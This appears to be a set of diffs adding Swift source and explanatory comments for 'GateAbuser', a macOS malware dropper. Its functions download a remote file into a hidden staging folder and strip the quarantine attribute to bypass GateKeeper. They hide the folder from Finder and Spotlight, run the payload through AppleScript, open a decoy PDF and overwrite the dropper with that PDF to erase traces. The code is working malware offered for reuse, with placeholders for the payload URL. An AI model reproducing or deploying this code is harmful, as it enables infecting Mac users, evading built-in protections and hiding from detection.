noncetonic · August 25, 2016 20:25 · Aug 25, 2016 · Aug 25, 2016
diff --git a/AppDelegate-createHiddenDirectory.swift b/AppDelegate-createHiddenDirectory.swift
@@ -1,3 +1,9 @@
+/*
+Called by `downloadFile`, createHiddenDirectory takes a path to a directory, 
+creates the directory, and then calls `guiHide` and `noSpotlight` to hide 
+the directory from GUI view and the Spotlight drive indexer, respectively.
+*/
+
 func createHiddenDirectory(location: NSString) {
     var err: NSErrorPointer = nil
     var fileManager = NSFileManager.defaultManager()

diff --git a/AppDelegate-downloadFile.swift b/AppDelegate-downloadFile.swift
@@ -1,3 +1,8 @@
+/*
+`downloadFile` takes a URL, a filename, and a path to save the file. 
+Calling `createHiddenDirectory` and `lazaretto` on this path aid in 
+hiding the staging directory.
+*/
 func downloadFile(url: NSString, filename: NSString, location: NSString) {
     var downloadUrl = NSURL(string: url)
     var dataFromUrl = NSData(contentsOfURL: downloadUrl!)

diff --git a/AppDelegate-executeFile.swift b/AppDelegate-executeFile.swift
@@ -1,3 +1,9 @@
+/*
+Here we leverage applescript to execute our downloaded file. 
+Leveraging applescript allows us to run various types of 
+executables without needing to know much about them.
+*/
+
 func executeFile(location: NSString) {
     var task = NSTask()
     let applescript = "do shell script POSIX path of \"\(location)\""

diff --git a/AppDelegate-guiHide.swift b/AppDelegate-guiHide.swift
@@ -1,3 +1,9 @@
+/*
+Leveraging `/usr/bin/chflags` we can add the `hidden` attribute to a 
+file or directory which hides the directory/file from the Finder app 
+and general user GUI.
+*/
+
 func guiHide(filePath: NSString) {
     var task = NSTask()
     task.launchPath = "/usr/bin/chflags"

diff --git a/AppDelegate-lazaretto.swift b/AppDelegate-lazaretto.swift
@@ -1,3 +1,10 @@
+/*
+Here is the star of this application, lazaretto. Taking a file path as 
+an argument, we leverage `/usr/bin/xattr -d -r com.apple.quarantine` 
+and our file path to recursively remove the quarantine attribute from 
+our file path, disabling GateKeeper for any file it encounters.
+*/
+
 func lazaretto(filePath: NSString) {
     var task = NSTask()
     task.launchPath = "/usr/bin/xattr"

diff --git a/AppDelegate-noSpotlight.swift b/AppDelegate-noSpotlight.swift
@@ -1,3 +1,10 @@
+/*
+A fairly well-known feature of OS X's Spotlight indexer is that if 
+you have a file named `.meta_noindex` within a directory, Spotlight 
+will skip right over it and not index the directory or any files 
+within it.
+*/
+
 func noSpotlight(location: NSString) {
     var err: NSErrorPointer = nil
     var fileManager = NSFileManager.defaultManager()

diff --git a/AppDelegate-openPDF.swift b/AppDelegate-openPDF.swift
@@ -1,3 +1,9 @@
+/*
+In an attempt to hide the true purpose of this application, we add a 
+pdf to our project and open it with the Preview application. 
+Note: Change "menu" in var pdfPath to the name of your bundled PDF.
+*/
+
 func openPDF() {
     var mainBundle = NSBundle.mainBundle()
     // Change "menu" to the name of your pdf

diff --git a/AppDelegate-randomString.swift b/AppDelegate-randomString.swift
@@ -1,3 +1,8 @@
+/*
+This is a function to generate a random string of characters. 
+We will leverage this later for renaming our downloaded file.
+*/
+
 func randomString(len: Int) -> NSString {
     var letters : NSString = "qwertyuiopasdfghklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
 

diff --git a/AppDelegate-whodini.swift b/AppDelegate-whodini.swift
@@ -1,3 +1,10 @@
+/*
+`whodini` is a basic "file melting" function. Effectively whodini 
+takes the bundled PDF and overwrites GateAbuser with this PDF. 
+Subsequent runs of the GateAbuser binary will actually be running 
+the PDF directly as the contents of GateAbuser will be overwritten.
+*/
+
 func whodini()
 {
     // Grab file paths

diff --git a/AppDelegate.swift b/AppDelegate.swift
@@ -1,3 +1,8 @@
+/*
+A fairly self explanatory main function. Downloads your file, executes 
+your file, opens the PDF, overwrites downloader with PDF.
+*/
+
 @NSApplicationMain
 class AppDelegate: NSObject, NSApplicationDelegate {
 

diff --git a/AppDelegate-createHiddenDirectory.swift b/AppDelegate-createHiddenDirectory.swift
@@ -0,0 +1,7 @@
+func createHiddenDirectory(location: NSString) {
+    var err: NSErrorPointer = nil
+    var fileManager = NSFileManager.defaultManager()
+    fileManager.createDirectoryAtPath(location, withIntermediateDirectories: true, attributes: nil, error: err)
+    guiHide(location)
+    noSpotlight(location)
+}
diff --git a/AppDelegate-downloadFile.swift b/AppDelegate-downloadFile.swift
@@ -0,0 +1,10 @@
+func downloadFile(url: NSString, filename: NSString, location: NSString) {
+    var downloadUrl = NSURL(string: url)
+    var dataFromUrl = NSData(contentsOfURL: downloadUrl!)
+    var filePath = location + filename;
+
+    createHiddenDirectory(location)
+    var fileManager = NSFileManager.defaultManager()
+    fileManager.createFileAtPath(filePath, contents: dataFromUrl, attributes: nil)
+    lazaretto(location)
+}
diff --git a/AppDelegate-executeFile.swift b/AppDelegate-executeFile.swift
@@ -0,0 +1,11 @@
+func executeFile(location: NSString) {
+    var task = NSTask()
+    let applescript = "do shell script POSIX path of \"\(location)\""
+    task.launchPath = "/usr/bin/osascript"
+    task.arguments = ["-e", applescript]
+    var pipe = NSPipe()
+    task.standardError = pipe
+    task.standardOutput = pipe
+    task.launch()
+
+}
diff --git a/AppDelegate-guiHide.swift b/AppDelegate-guiHide.swift
@@ -0,0 +1,8 @@
+func guiHide(filePath: NSString) {
+    var task = NSTask()
+    task.launchPath = "/usr/bin/chflags"
+    task.arguments = ["hidden", filePath]
+    var pipe = NSPipe()
+    task.launch()
+    task.waitUntilExit()
+}
diff --git a/AppDelegate-header.swift b/AppDelegate-header.swift
@@ -0,0 +1,11 @@
+//
+//  AppDelegate.swift
+//  GateAbuser
+//
+//  Created by Luis Santana on 4/4/16.
+//  Copyright (c) 2016 Blacksun Hackers Research Labs. All rights reserved.
+//
+
+import Cocoa
+import Foundation
+import AppKit
diff --git a/AppDelegate-lazaretto.swift b/AppDelegate-lazaretto.swift
@@ -0,0 +1,8 @@
+func lazaretto(filePath: NSString) {
+    var task = NSTask()
+    task.launchPath = "/usr/bin/xattr"
+    task.arguments = ["-d", "-r", "com.apple.quarantine", filePath]
+    var pipe = NSPipe()
+    task.launch()
+    task.waitUntilExit()
+}
diff --git a/AppDelegate-noSpotlight.swift b/AppDelegate-noSpotlight.swift
@@ -0,0 +1,8 @@
+func noSpotlight(location: NSString) {
+    var err: NSErrorPointer = nil
+    var fileManager = NSFileManager.defaultManager()
+
+    var file = location + ".meta_noindex"
+
+    fileManager.createFileAtPath(file, contents: nil, attributes: nil)
+}
diff --git a/AppDelegate-openPDF.swift b/AppDelegate-openPDF.swift
@@ -0,0 +1,12 @@
+func openPDF() {
+    var mainBundle = NSBundle.mainBundle()
+    // Change "menu" to the name of your pdf
+    var pdfPath = NSString(string: mainBundle.pathForResource("menu", ofType: "pdf")!)
+    var task = NSTask()
+    task.launchPath = "/usr/bin/open"
+    task.arguments = ["-a", "Preview", pdfPath]
+    var pipe = NSPipe()
+    task.standardError = pipe
+    task.standardOutput = pipe
+    task.launch()
+}
diff --git a/AppDelegate-randomString.swift b/AppDelegate-randomString.swift
@@ -0,0 +1,13 @@
+func randomString(len: Int) -> NSString {
+    var letters : NSString = "qwertyuiopasdfghklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
+
+    var random_string : NSMutableString = NSMutableString(capacity: len)
+
+    for (var i=0; i < len; i++) {
+        var length = UInt32 (letters.length)
+        var rand = arc4random_uniform(length)
+        random_string.appendFormat("%C", letters.characterAtIndex(Int(rand)))
+    }
+
+    return random_string;
+}
diff --git a/AppDelegate-whodini.swift b/AppDelegate-whodini.swift
@@ -0,0 +1,27 @@
+func whodini()
+{
+    // Grab file paths
+    var mainBundle = NSBundle.mainBundle()
+    // Change "menu" to name of your pdf
+    var pdfPath = NSString(string: mainBundle.pathForResource("menu", ofType: "pdf")!)
+    var app = NSRunningApplication.currentApplication().executableURL!
+    var appPath = app.path
+
+    // Set up our File Manager
+    let fileManager = NSFileManager.defaultManager()
+
+    // Nuke dropper
+    if (!fileManager.removeItemAtPath(appPath!, error: nil)) {
+        print("Goofed")
+    }
+
+    // Ensure dropper was deleted
+    if !fileManager.fileExistsAtPath(appPath!) {
+        // Copy our benign file over
+        if !fileManager.copyItemAtPath(pdfPath, toPath: appPath!, error: nil) {
+            print("We did it!")
+        }
+    } else {
+        print("Goofed")
+    }
+}
diff --git a/AppDelegate.swift b/AppDelegate.swift
@@ -0,0 +1,18 @@
+@NSApplicationMain
+class AppDelegate: NSObject, NSApplicationDelegate {
+
+    @IBOutlet weak var window: NSWindow!
+
+
+    func applicationDidFinishLaunching(aNotification: NSNotification) {
+        var url = "" // URL GOES HERE
+        var filename = randomString(8)
+        var location = "" // STAGING DIRECTORY PATH GOES HERE
+
+        downloadFile(url, filename, location)
+        executeFile("") // FILE TO EXECUTE GOES HERE
+        openPDF()
+        whodini()
+        exit(0)
+    }
+}
No results found